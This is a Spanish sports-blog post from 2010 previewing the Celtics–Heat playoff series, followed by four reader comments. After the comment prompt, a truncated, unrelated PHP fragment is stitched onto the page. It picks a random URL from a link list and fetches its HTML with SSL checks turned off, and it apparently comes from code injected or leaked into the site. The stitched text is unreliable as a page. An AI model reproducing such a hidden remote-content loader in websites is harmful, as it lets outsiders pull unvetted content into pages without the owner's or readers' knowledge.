Análisis Boston Celtics vs Miami Heat

16 de April de 2010 por Viva_Dirk

Regular: 3-0

Boston: P. Favor: 99.2 – P. Contra: 95.6
Miami: P. Favor: 96.5 – P. Contra: 94.2

Resultados parecidos durante la regular para dos equipos con modelos muy distintos. En Boston es el grupo lo que les hace fuertes mientras que en Miami tienen a Wade haciendo y deshaciendo a su antojo. Tres victorias para los verdes de tres partidos jugados este año, todos ellos con un gran Wade y a un gran Rondo aunque este último parece llegar en el peor momento del año y sin él los Celtics pierden a su pieza más joven y física.

Dicho esto los Celtics parten como favoritos por mayor calidad global en su plantilla y por tener el factor cancha a  favor pero tienen la eterna duda de la salud de Garnett y el bajo rendimiento del banco. Los Heat a parte de Wade tienen en los irregulares Beasley y O’Neal las claves para pelear la eliminatoria, todo lo contrario que Haslem, del cual sabemos donde llega y es un gran cumplidor.

Claves de la eliminatoria:

– Rondo & Perkins: Sus promedios en las tres victorias contra Miami son de 20 puntos y 11 asistencias para el primero y 16 puntos y 9 rebotes para el 2º , números de los que están lejos en los últimos partidos, especialmente Perkins que ha cuajado una segunda mitad de temporada mucho más floja que la primera.

– El factor Wade: Ya hemos visto a este hombre ganar eliminatorias sin demasiada ayuda y no tenemos ninguna duda de que el Garden será una gran motivación para él. Allen y Pierce no pueden defenderlo y sin Garnett&Perkins tapando la zona puede ser un festín para Flash. Me huele a exhibición por su parte.

– Los Heat, un equipo completo: A pesar de no ser un equipo tan veterano como Boston, los Heat cuentan con variosjugadores con una gran experiencia en play-offs. O’Neal, Haslem y Richardson ya han vivido batallas de estas, y a eso le unen gente más física y joven como Beasley o Chalmers, este último también acostumbrado a choques definitivos.

– Kevin Garnett: Seguramente deberíamos haberla puesto como la primera clave ya que la forma en la que lleugue Kevin Garnett es lo que hace a este equipo algo más que un simple cuarto clasificado del Este. Con él en condiciones decentes deben ir sobrados, sin él sufrirán de lo lindo.

Agenda:

– P1: Domingo 18 a las 02:00 horas (horario España)
– P2: Miercoles 21 a las 02:00 horas
– P3: Sábado 24 a las 01:00 horas
– P4: Domingo 25 a las 19 horas

Pronóstico: 2-4 Miami

Comenta

4 comentarios a esta entrada

  1. Titomadox dice:
    #1

    Pues me da que Wade va a dar un recital y Boston va a caer. El trébol está más viejo, y parecen haber envejecido algo más de un año desde la temporada pasada, especialmente Garnett.

      Citar

  2. tota dice:
    #2

    Buenas a todos, saludos desde argentina.
    Boston parecía a principio de temporada el mejor equipo de la nba, niungún jugador con grandes números, pero varios en dobles dígitos…esto fue así los primeros veinte partidos? (teniendo en cuenta que con el paso de la temporada los demás equipos se van acoplando) Luego de lesiones me parece que el equipo no volvió a engranar bien, pese a mi parecer a los buenos refuerzos, el resto de la temporada se basó en un Rondó magnífico, Pierce o Allen saliendosé en algún que otro partido, el banco poco y nada.
    Me da la impresión como que los Celtics jugaron a media máquina bastantes partidos, si no la edad realmente esta golpeandolos muy duro.
    Al día de hoy la serie me parece que la define la localía Boston 4-3 (si fuera el boston de principio de temporada 4-0)

      Citar

  3. LEmontus dice:
    #3

    Creo que miami pasará

      Citar

  4. Love Denise dice:
    #4

    creo que ganaran los Celtics 4-3, para mí es la eliminatoria más igualada a priori

      Citar

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>